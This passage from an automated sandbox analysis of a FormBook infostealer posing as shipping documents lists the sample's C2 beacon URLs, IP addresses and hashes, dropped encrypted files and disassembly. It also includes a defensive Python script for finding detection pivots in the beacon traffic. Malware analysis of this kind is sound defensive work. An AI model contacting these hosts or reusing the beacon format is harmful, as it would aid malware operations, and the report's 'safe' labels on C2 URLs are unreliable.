  Source: certutil.exe, 0000000E.00000002.3715079219.00000000067CE000.00000004.10000000.00040000.00000000.sdmp; QAWHbhvedb.exe, 0000000F.00000002.3714172615.00000000036FE000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false
  • Avira URL Cloud: safe
  Reputation: unknown
https://ac.ecosia.org/autocomplete?q=
  Source: certutil.exe, 0000000E.00000002.3717204087.00000000086EB000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  • URL Reputation: safe
  Reputation: unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
  Source: certutil.exe, 0000000E.00000002.3717204087.00000000086EB000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  • URL Reputation: safe
  Reputation: unknown
https://www.fastmailusercontent.com/filestorage/css/main.css
  Source: certutil.exe, 0000000E.00000002.3715079219.00000000067CE000.00000004.10000000.00040000.00000000.sdmp; QAWHbhvedb.exe, 0000000F.00000002.3714172615.00000000036FE000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false
  • Avira URL Cloud: safe
  Reputation: unknown
http://www.karak-networks.online
  Source: QAWHbhvedb.exe, 0000000F.00000002.3716040439.0000000004FD8000.00000040.80000000.00040000.00000000.sdmp
  Malicious: false
  • Avira URL Cloud: safe
  Reputation: unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
  Source: certutil.exe, 0000000E.00000002.3717204087.00000000086EB000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  • URL Reputation: safe
  Reputation: unknown
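Every URL in the two tables above carries the same verdicts, "Avira URL Cloud: safe" and reputation "unknown", so a reputation lookup on its own would not have flagged this traffic. What the tables do show is structure: each beacon host is requested under a single four-character directory, either bare or with a two-parameter query, and the second parameter (UXR=kTP8XfI8) is identical on every host while the first (5HE=...) is a 140-character base64 value that differs per host in each of the URLs the example below includes. The following Python is an added example, not Joe Sandbox output and not code from the sample; it parses a URL list, finds the parameter values that repeat across distinct hosts, and measures the base64 payloads without claiming to decode them. The URL list is copied from the tables above (the duckduckgo and ecosia entries, browser search-provider strings from the same dumps, serve as benign controls); the four-character directory rule is an assumption fitted to this report's URLs, not a general FormBook property.

```python
"""Structural triage of the URLs this sandbox run recovered.

Added example for this report, not Joe Sandbox output and not code from the
sample. URLS is copied from the report's URL tables; the duckduckgo and ecosia
entries act as benign controls. The four-character directory rule below is
fitted to this report's URLs and is an assumption, not a general property.
"""
import base64
import binascii
import re
from urllib.parse import urlsplit

# Every beacon host in the report is requested under one directory of four
# lowercase alphanumerics, either bare ("/m8jb/") or with a two-parameter query.
BEACON_PATH = re.compile(r"^/[a-z0-9]{4}/$")

URLS = [
    "http://www.ecoaxion.com/m8jb/",
    "http://www.ecoaxion.com/m8jb/?5HE=9yAQtAPv7VajbMozC95KjxHcDgZBNAloOjx9xoxEZfGfjxdjUWGlbu7OvwZLKHzd+pQOJ7zTb4VBUF6T+jZVGdwVGTofMGVOhhQduo/gOWAVXXfufsk0uisH+JnvVli93h1SVJOpBT3C&UXR=kTP8XfI8",
    "http://www.evoolihubs.shop/bked/?5HE=QDDEnNwQpb5JatkHP5Ujvy7oB3/mJq1wkhHN+QA3R40qpI1p3EHt4xIxf5IDvSUmLm24xdAndElLjryJNFC6VX5rU/4u1ZoNU71gjUwgGDzFCy1dhdBzksntmTnqyiroVCcmEoAnVJrC&UXR=kTP8XfI8",
    "http://www.fardehb.top/or4s/?5HE=UOVTILZNORwRjwgBkAdUsPPg2JHxvT7McsE496DqNpR2tR/wGus0wQl5jLS0JR4P7qKOiEjtUO6PhFxn6GFMV2L3p99CK/w4pk8/xjMAjlx+vsYxSa6ADJMuQ/dVnyYbrtzDu6vYzAhS&UXR=kTP8XfI8",
    "http://www.nationsincbook.com/ka5q/",
    "http://www.nationsincbook.com/ka5q/?5HE=sbHYTBVMO+ZN3cimlSddhWyxOd9+ryqDwURfGp0ztBsxBU1bfXTxhmHIz6dWKnPi5VSox+9kY/vve8cZkTHpuVybjDJHaA/MeMU7Z/Kl4srSdSD7kaL79EM6BOjJOd/XEoe9QrfXL9O6&UXR=kTP8XfI8",
    "http://www.karak-networks.online/2afv/",
    # benign controls, also from the report's memory-dump URL table
    "https://duckduckgo.com/ac/?q=",
    "https://www.ecosia.org/newtab/",
]


def split_query(query):
    """Split a raw query string without percent- or plus-decoding, so that a
    base64 value keeps its '+' and '/' characters (parse_qsl would turn '+'
    into a space and corrupt the blob)."""
    pairs = []
    for item in query.split("&"):
        if item:
            name, _, value = item.partition("=")
            pairs.append((name, value))
    return pairs


def parse_beacon(url):
    """(host, path, [(name, value), ...]) when url has the beacon shape seen
    in this report, otherwise None."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None
    if not BEACON_PATH.match(parts.path):
        return None
    return parts.hostname, parts.path, split_query(parts.query)


def beacon_hosts(urls):
    """Distinct hosts that received a beacon-shaped request."""
    return sorted({p[0] for p in map(parse_beacon, urls) if p})


def shared_parameters(urls):
    """(name, value) pairs that recur on more than one distinct host.

    A value that is byte-identical across unrelated domains cannot be
    per-victim or per-request data; it is a build constant and the most
    durable pivot this traffic offers for a proxy or IDS rule."""
    hosts_by_pair = {}
    for parsed in map(parse_beacon, urls):
        if parsed:
            host, _, params = parsed
            for pair in params:
                hosts_by_pair.setdefault(pair, set()).add(host)
    return {pair: sorted(hosts) for pair, hosts in hosts_by_pair.items()
            if len(hosts) > 1}


def decoded_size(value):
    """Byte length of a base64 query value, or None if it is not base64.
    The content is not interpreted; a fixed decoded size across hosts is
    itself the signal (free text would vary in length)."""
    try:
        return len(base64.b64decode(value, validate=True))
    except (binascii.Error, ValueError):
        return None


def triage(urls):
    """Summary of a URL list: beacon hosts, campaign constants, and the set
    of decoded sizes of the remaining (per-host) parameter values."""
    constants = shared_parameters(urls)
    sizes = {decoded_size(value)
             for parsed in map(parse_beacon, urls) if parsed
             for name, value in parsed[2] if (name, value) not in constants}
    return {
        "beacon_hosts": beacon_hosts(urls),
        "campaign_constants": {"=".join(k): v for k, v in constants.items()},
        "blob_sizes": sorted(sizes - {None}),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(URLS), indent=2))
```

On this report's URLs the only value shared across hosts is UXR=kTP8XfI8, and every 5HE value decodes to exactly 105 bytes with no two hosts sharing one, so a detection rule should key on the constant token and the path shape rather than on the blob or on any single domain; the domains are disposable, the constant is what the build carries from host to host.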
IP / Domain / Country / ASN / ASN Name / Malicious
103.168.172.37
  Domain: www.jleabres.com
  Country: unknown
  ASN: 7575 AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
  Malicious: false
13.248.169.48
  Domain: www.ecoaxion.com
  Country: United States
  ASN: 16509 AMAZON-02US
  Malicious: false
188.114.97.3
  Domain: www.olhadeputat.com
  Country: European Union
  ASN: 13335 CLOUDFLARENETUS
  Malicious: false
76.223.67.189
  Domain: funnelkakes.com
  Country: United States
  ASN: 16509 AMAZON-02US
  Malicious: false
188.114.96.3
  Domain: www.evoolihubs.shop
  Country: European Union
  ASN: 13335 CLOUDFLARENETUS
  Malicious: false
84.32.84.32
  Domain: sehraji.com
  Country: Lithuania
  ASN: 33922 NTT-LT-ASLT
  Malicious: false
203.161.41.207
  Domain: www.fardehb.top
  Country: Malaysia
  ASN: 45899 VNPT-AS-VNVNPTCorpVN
  Malicious: false
148.135.97.125
  Domain: www.809934.com
  Country: Sweden
  ASN: 158 ERI-ASUS
  Malicious: false
3.33.130.190
  Domain: shiybalinks.com
  Country: United States
  ASN: 8987 AMAZONEXPANSIONGB
  Malicious: false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1477464
Start date and time: 2024-07-21 13:29:28 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 2s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Documente de expediere.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/5@17/9
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 57
• Number of non-executed functions: 275
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target QAWHbhvedb.exe, PID 396 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded the maximum capacity and may be missing disassembly code
Time / Type / Description
09:18:27  API Interceptor  9454911x Sleep call for process: certutil.exe modified
Match / Associated Sample Name or URL / Detection / Threat Name / Context
103.168.172.37
  jlsvOH1c8bSRKqM.exe (malicious; FormBook)
  • www.jleabres.com/blhi/
  eNXDCIvEXI.exe (malicious; FormBook)
  • www.celebration24.co.uk/mcz6/
  H25iQbxCki.exe (malicious; FormBook)
  • www.celebration24.co.uk/mcz6/
  Factura (3).exe (malicious; FormBook)
  • www.celebration24.co.uk/mcz6/
  PO0424024.exe (malicious; FormBook, PureLog Stealer)
  • www.celebration24.co.uk/pq0o/
13.248.169.48
  Shipping Documents.exe (malicious; FormBook, PureLog Stealer)
  • www.ansverity.com/7llb/
  payment swift 77575.exe (malicious; FormBook, PureLog Stealer)
  • www.cyclope.us/lmp7/
  H37012.exe (malicious; FormBook, PureLog Stealer)
  • www.omlyes.com/h209/?8pYtNR=AvKPPvPH0Z4T&nffDxB=iZtTggAtf0B+j3fOE6HWriWWpmX0i4qAS7HiYOC76+2tWZxBemDORvlFY8e+3zKAzMXK
  Inquiry files v2.exe (malicious; FormBook, PureLog Stealer)
  • www.techacademy.store/cf3x/
  nK1Y86mbzfbkwpB.exe (malicious; FormBook, PureLog Stealer)
  • www.techacademy.store/cf3x/
  SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.16736.4797.exe (malicious; FormBook, PureLog Stealer)
  • www.ansverity.com/7llb/
  OrderPI.exe (malicious; FormBook)
  • www.cetys.com/6uii/
  PO HA25622.exe (malicious; FormBook)
  • www.webmedianews.com/h209/?Dzrx=fA8Yes4AKfUDc53Wnj6AqZfIYHxfB2WY7SMSertcKD9M3ZyyZdC5GDMmxBggMfVQA7Zc&mlYT=SxolxB
  IMG_00110724.exe (malicious; FormBook)
  • www.ansverity.com/7llb/
  SecuriteInfo.com.Win32.PWSX-gen.17883.22231.exe (malicious; FormBook)
  • www.ansverity.com/7llb/
188.114.97.3
  IEnetcache.hta (malicious; Cobalt Strike, FormBook, GuLoader)
  • www.bowxsplain.xyz/3nh2/
  Price List.xls (malicious; FormBook, GuLoader)
  • gurl.pro/skohle
  PO_202407174854.xls (malicious; Unknown)
  • gurl.pro/kdp5hn
  PO_202407174854.xls (malicious; Unknown)
  • gurl.pro/kdp5hn
  payment swift 77575.exe (malicious; FormBook, PureLog Stealer)
  • www.tktokopedia.vip/5s4h/
  SecuriteInfo.com.Win32.MalwareX-gen.23257.3368.exe (malicious; FormBook)
  • www.adigidea.com/mu94/?mHLHPL=8XOV7l9czMl0BY0Yfw8K+bslCpjGRTxLH8wb+mkhMYxfonFif4r3bWu7Z4KNa8GAkHUscmW3PA==&nfkddr=R4rDfZ
  BSX#24001602.exe (malicious; Azorult, GuLoader)
  • bshd1.shop/OP341/index.php
  NEW RFQ - Viasat LSDR.exe (malicious; FormBook, PureLog Stealer)
  • www.okbharat.best/976u/?L67dy=LcbIMBKHrUlu6g3+s5ZJggsLZ4EkQq4qBqn1SkrzjOBWV2IrUom/64+35gCpT46aLOm4V6t+Xi15cxz33W19sMSR+lb0o4YODFAMPjkJlAv5H57LJA==&zP=ivqLGH1h
  42ZjBoAnX1.rtf (malicious; FormBook)
  • www.mtplus.online/sk49/?aBWDfH=DP6tx2QHp&K4lp=vYCMgY7XjBZl5nBh+gwJqyUJvQ4WqZqIv44MKWq7JUyccEz8DNQVWvH3FVsEB9Oz/eitLg==
  Quotation.xls (malicious; Remcos)
  • gurl.pro/fycglx
Match / Associated Sample Name or URL / Detection / Threat Name / Context
www.evoolihubs.shop
  docs_pdf.exe (malicious; FormBook)
  • 188.114.96.3
  SHIPPING DOCS_pdf.exe (malicious; FormBook)
  • 188.114.96.3
  purchase order_pdf.exe (malicious; FormBook)
  • 188.114.96.3
  PO454355 Pdf.exe (malicious; FormBook)
  • 188.114.96.3
  Quotation List Pdf.exe (malicious; FormBook)
  • 188.114.97.3
  arrival notice_pdf.exe (malicious; FormBook)
  • 188.114.97.3
  AirWaybill_Document Pdf.exe (malicious; FormBook)
  • 188.114.97.3
www.jleabres.com
  jlsvOH1c8bSRKqM.exe (malicious; FormBook)
  • 103.168.172.37
  DHL Receipt_AWB#20240079104.exe (malicious; FormBook)
  • 103.168.172.52
www.olhadeputat.com
  AWB NO. 077-57676135055.exe (malicious; FormBook)
  • 172.67.146.224
www.fardehb.top
  Your file name without extension goes here.exe (malicious; FormBook)
  • 203.161.41.207
Match / Associated Sample Name or URL / Detection / Threat Name / Context
CLOUDFLARENETUS
  AV 122769 - REFUND.exe (malicious; AgentTesla, PureLog Stealer)
  • 172.67.74.152
  CERERE DE PROPUNERE.pdf.exe (malicious; PureLog Stealer, Snake Keylogger)
  • 188.114.97.3
  Mm3Sjia18h.exe (malicious; FormBook, GuLoader)
  • 188.114.96.3
  D8J2VuFPRL.rtf (malicious; FormBook)
  • 172.66.43.27
  y3Bn3D8pOT.rtf (malicious; Unknown)
  • 172.66.40.229
  file.exe (malicious; Babadeda)
  • 172.64.41.3
  CrowdStrike.exe (malicious; Hatef Wiper)
  • 104.16.185.241
  file.exe (malicious; Babadeda)
  • 162.159.61.3
  CrowdStrike.exe (malicious; Hatef Wiper)
  • 104.16.185.241
  file.exe (malicious; Babadeda)
  • 162.159.61.3
AMAZON-02US
  D8J2VuFPRL.rtf (malicious; FormBook)
  • 3.64.163.50
  VAdlEMbrmJ.elf (malicious; Unknown)
  • 34.249.145.219
  Z4mLZDVZY3.elf (malicious; Unknown)
  • 54.171.230.55
  iGs5wjZOhO.elf (malicious; Unknown)
  • 54.247.62.1
  d92eGGZPEg.elf (malicious; Gafgyt)
  • 54.217.10.153
  file.exe (malicious; Babadeda)
  • 143.204.215.18
  file.exe (malicious; Babadeda)
  • 143.204.215.18
  file.exe (malicious; Babadeda)
  • 143.204.215.18
  Injector.exe (malicious; ZTrat)
  • 18.158.58.205
  file.exe (malicious; Babadeda)
  • 143.204.215.18
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
  desDGzeznq.elf (malicious; Mirai, Gafgyt, Okiru)
  • 103.169.127.247
  92.249.48.47-skid.arm7-2024-07-20T09_04_19.elf (malicious; Mirai, Moobot)
  • 103.183.132.59
  kz7iLmqRuq.exe (malicious; Quasar)
  • 103.174.178.147
  1721381284a144721a6b00c564aa1361f546102802d576ee829fd360b164bfc3ee68cc858a889.dat-decoded.exe (malicious; Remcos)
  • 103.161.133.243
  PURCHASING ORDER.exe (malicious; FormBook, PureLog Stealer)
  • 103.169.142.0
  uM1zMBpd2h.rtf (malicious; Remcos)
  • 103.161.133.121
  SecuriteInfo.com.Trojan.Siggen29.4082.22291.17805.exe (malicious; Remcos, DBatLoader)
  • 103.186.117.150
  Enquiry.exe (malicious; Remcos, DBatLoader)
  • 103.186.117.89
  42ZjBoAnX1.rtf (malicious; FormBook)
  • 103.161.133.121
  https://zohoinvoicepay.com/invoice/horizonhivesholdings/secure?CInvoiceID=2-5d1a6e6e7fc02c6aa9c16ba084eaf7b11969e250db6bf56b3ff921885bb1a02a1de112985005752c6b386aa74f5531aa4b7fa92bbb84e57e4955efe41be6b38898e1fb71080bbb7a%20 (malicious; Unknown)
  • 103.163.152.75
                                              No context
                                              No context
Process: C:\Windows\SysWOW64\certutil.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category: modified
Size (bytes): 196608
Entropy (8bit): 1.1215420383712111
Encrypted: false
SSDEEP: 384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5: 9A809AD8B1FDDA60760BB6253358A1DB
SHA1: D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256: 95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512: 2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious: false
Reputation: moderate, very likely benign file
                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\Documente de expediere.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):272384
                                              Entropy (8bit):7.993900264495581
                                              Encrypted:true
                                              SSDEEP:6144:/7m5oF4FRityDVEHnRAns0bUFgRTHKHYOT8eLglULIkGl:/ahcQVEHnyQ0HKHPTFklULTG
                                              MD5:4BC1F7CBF66CD91F18B9405E5B217355
                                              SHA1:4E9040AD4F639DE22224589034A6AEAFF1CE20C1
                                              SHA-256:A5FB4961B6C49E521C69BDE30E015E48D4F7012EFE0196C93533D9A96C0AE6D9
                                              SHA-512:41E0687D344C1F87973575BC70AB6FC6BBF20E92755A42E1AB1F4878C310C806069109ED76085B818303834289C52B9B4937F9A70FC8071E45CE1CF49C231486
                                              Malicious:false
                                              Reputation:low
                                              Preview:z.vb.L8N5i..=.....X[...x08...N513A4AJ792AXXI67P30SL8N513A4A.792OG.G6.Y...Mt..e[(Ga:EVU395iUV>]_'lZ+.CF/.($.}}.x5&RR~>=Yh8N513A48K>..!?.tVP..P4."...!S.P...}8?.,....3+..\R[|T&.792AXXI6g.30.M9N.xz 4AJ792AX.I46[2;SL.J513A4AJ79rTXXI&7P3.WL8Nu13Q4AJ592GXXI67P36SL8N513A.EJ7;2AXXI65Ps.SL(N5!3A4AZ79"AXXI67@30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792o,=1B7P34GH8N%13A"EJ7)2AXXI67P30SL8N.13!4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513
                                              Process:C:\Users\user\Desktop\Documente de expediere.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):9810
                                              Entropy (8bit):7.622262175324475
                                              Encrypted:false
                                              SSDEEP:192:VfyKYff6Bvw6GzUTBpqjQTqxGMgyjcxBg2pF6/ArYiov:lyPXQZQQT3ecxa2p6Arcv
                                              MD5:D995205A5E7B8C003CB4235F0495DEF3
                                              SHA1:E4DCE1AE5D00441514560FBA070B093BF5ECACC8
                                              SHA-256:0752F6537BA15B50ECDC870328500596B54AE2E15A621B1ACE77999DCDD40535
                                              SHA-512:01CDAA9700C54D30D24CB24FAB19CA3DA64EDB71B8DC13F07843B465A6927A516E9649B0CA24101A6E3B276F3F3EFB671E5E3147284A003328740D5472447584
                                              Malicious:false
                                              Reputation:low
                                              Preview:EA06..t...f.i..d...K%.c3....i..qc...`...c7..gSY..kc.M...]....)...K........|. .o..c.M......9.M...:...S@...l.....3.Z..m:..6.P.o.n..Y......g.:.M&.@..Y....N.l.Y.........:.Mf....r.'3i...c ....Ab.H..... .F.3<..Y..6...,.b....`...x..l....Bt.....X..0.M.....p...Yf`5_..j....f.5_..r.U..l@5_....U..l.5_..b.U..`5\..>3 ..M.^.b.Z..m7.z..q7......@.....S...G../Z...@.....jt....p.u....$.p./.q9...g.G_T......,.>_.......zm6....y....S0...................`.M..`... ...d...@..0.'.5...{>K...c..sP..X..._..r......>K.#G.c..3|vI..G.5..&`8_..md..i|vI....d.h.,. ......%..8...[=....&.@;..9...@.L..6y..f..+ .ffV9...7..l....f. .E...Y....3.Y.............vY.....@.....2p....<d....,vd.........!+ .'&@....,fq3.Yl.9.......r.3.X...c3{,.gg.Y.!...Gf`....,f.:.Nl.. .#8.....c.@........r.h.s.....,vh......t.....40.....f.....fS....4..@.6.-..p..S.5..3...S@.N..;6.`..:..l....m9.....c.`..Y.S.wx.....vn......`.E.....@y6....p.c3.-..5..b.!....F ....B5d..'S........vp......f6K-.t...B3`...@.;9.X...b.....(........g ...L..{4..d...
                                              Process:C:\Users\user\Desktop\Documente de expediere.exe
                                              File Type:ASCII text, with very long lines (29698), with no line terminators
                                              Category:modified
                                              Size (bytes):29698
                                              Entropy (8bit):3.538058660985739
                                              Encrypted:false
                                              SSDEEP:384:rYzxrp0zUaIPEtmLXDXCFldqpeRYT3509:rYz7DaIPEtEDXCIpr509
                                              MD5:1890D198BDAD5A43481314032F348DCA
                                              SHA1:34FD404F24C82A88E82BC082F6144166F29ACBF7
                                              SHA-256:45DBBB23FF1C7688CD724E4CD8FF7126A6B3AEE215CD78F43FE0888319DDDEB0
                                              SHA-512:4FF356C5E5B9F4C5768B2756BC3943A2A6D137FF4336448B0E7D9525CAE854DD6A2138FF312F1E2FD009C43BD413610E63517366E27B101A8D24099355E4A7C4
                                              Malicious:false
                                              Reputation:low
                                              Preview:1y669cfd92fddd1311116768c97c111111779:5695c:76111111779:5e97cb83111111779:6699c97f111111779:569bc:76111111779:5e9dcb7d111111779:669fc944111111779:56:1c:43111111779:5e:3cb3f111111779:66:5c975111111779:56:7c:7d111111779:5e:9cb7d111111779:66:b44d1779:56:dc:7f111111779:9e55ggggggcb85111111779::657ggggggc975111111779:9659ggggggc:7d111111779:9e5bggggggcb7d111111779::65dggggggc93f111111779:965fggggggc:75111111779:9e61ggggggcb7d111111779::663ggggggc97d111111779:9665gggggg44d:779:9e67ggggggcb86111111779:66e1c984111111779:56e3c:76111111779:5ee5cb83111111779:66e7c944111111779:56e9c:43111111779:5eebcb3f111111779:66edc975111111779:56efc:7d111111779:5ef1cb7d111111779:66f344d1779:56f5c:72111111779:9e79ggggggcb75111111779::67bggggggc987111111779:967dggggggc:72111111779:9e7fggggggcb81111111779::681ggggggc97:111111779:9683ggggggc:44111111779:9e85ggggggcb43111111779::687ggggggc93f111111779:9689ggggggc:75111111779:9e8bggggggcb7d111111779::68dggggggc97d111111779:968fgggggg44d:779:5e91cb84111111779:66b1c979
                                              Process:C:\Users\user\Desktop\Documente de expediere.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):272384
                                              Entropy (8bit):7.993900264495581
                                              Encrypted:true
                                              SSDEEP:6144:/7m5oF4FRityDVEHnRAns0bUFgRTHKHYOT8eLglULIkGl:/ahcQVEHnyQ0HKHPTFklULTG
                                              MD5:4BC1F7CBF66CD91F18B9405E5B217355
                                              SHA1:4E9040AD4F639DE22224589034A6AEAFF1CE20C1
                                              SHA-256:A5FB4961B6C49E521C69BDE30E015E48D4F7012EFE0196C93533D9A96C0AE6D9
                                              SHA-512:41E0687D344C1F87973575BC70AB6FC6BBF20E92755A42E1AB1F4878C310C806069109ED76085B818303834289C52B9B4937F9A70FC8071E45CE1CF49C231486
                                              Malicious:false
                                              Reputation:low
                                              Preview:z.vb.L8N5i..=.....X[...x08...N513A4AJ792AXXI67P30SL8N513A4A.792OG.G6.Y...Mt..e[(Ga:EVU395iUV>]_'lZ+.CF/.($.}}.x5&RR~>=Yh8N513A48K>..!?.tVP..P4."...!S.P...}8?.,....3+..\R[|T&.792AXXI6g.30.M9N.xz 4AJ792AX.I46[2;SL.J513A4AJ79rTXXI&7P3.WL8Nu13Q4AJ592GXXI67P36SL8N513A.EJ7;2AXXI65Ps.SL(N5!3A4AZ79"AXXI67@30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792o,=1B7P34GH8N%13A"EJ7)2AXXI67P30SL8N.13!4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513A4AJ792AXXI67P30SL8N513
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):7.120625017765173
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:Documente de expediere.exe
                                              File size:1'168'384 bytes
                                              MD5:3ed2eca087936d7ab479ce62c50a9f2a
                                              SHA1:0616bdb97bf793a387359ca33a089b328d131519
                                              SHA256:42b9ac8b067460277e68574662bc607f84664a9c622608dec68e62e608dc9444
                                              SHA512:4db4416ba7200dd2a0e41db4c7990fbaa56627cb4b97bb3c4bedcc56d4948024be035e05230f56edddb6e44d107bde930ed64684052d48e9ccc3844944e112b8
                                              SSDEEP:24576:nAHnh+eWsN3skA4RV1Hom2KXMmHaxPzmOExj//NluSsbD5:ah+ZkldoPK8Yax4rNlvG
                                              TLSH:EC45AD0273D2C036FFABA2739B6AF64556BD78254123852F13981D79BD701B2233E663
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                                              Icon Hash:aaf3e3e3938382a0
                                              Entrypoint:0x42800a
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x66947F3D [Mon Jul 15 01:45:33 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:1
                                              File Version Major:5
                                              File Version Minor:1
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:1
                                              Import Hash:afcdf79be1557326c854b6e20cb900a7
                                              Instruction
                                              call 00007F3B608341EDh
                                              jmp 00007F3B60826FA4h
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              push edi
                                              push esi
                                              mov esi, dword ptr [esp+10h]
                                              mov ecx, dword ptr [esp+14h]
                                              mov edi, dword ptr [esp+0Ch]
                                              mov eax, ecx
                                              mov edx, ecx
                                              add eax, esi
                                              cmp edi, esi
                                              jbe 00007F3B6082712Ah
                                              cmp edi, eax
                                              jc 00007F3B6082748Eh
                                              bt dword ptr [004C41FCh], 01h
                                              jnc 00007F3B60827129h
                                              rep movsb
                                              jmp 00007F3B6082743Ch
                                              cmp ecx, 00000080h
                                              jc 00007F3B608272F4h
                                              mov eax, edi
                                              xor eax, esi
                                              test eax, 0000000Fh
                                              jne 00007F3B60827130h
                                              bt dword ptr [004BF324h], 01h
                                              jc 00007F3B60827600h
                                              bt dword ptr [004C41FCh], 00000000h
                                              jnc 00007F3B608272CDh
                                              test edi, 00000003h
                                              jne 00007F3B608272DEh
                                              test esi, 00000003h
                                              jne 00007F3B608272BDh
                                              bt edi, 02h
                                              jnc 00007F3B6082712Fh
                                              mov eax, dword ptr [esi]
                                              sub ecx, 04h
                                              lea esi, dword ptr [esi+04h]
                                              mov dword ptr [edi], eax
                                              lea edi, dword ptr [edi+04h]
                                              bt edi, 03h
                                              jnc 00007F3B60827133h
                                              movq xmm1, qword ptr [esi]
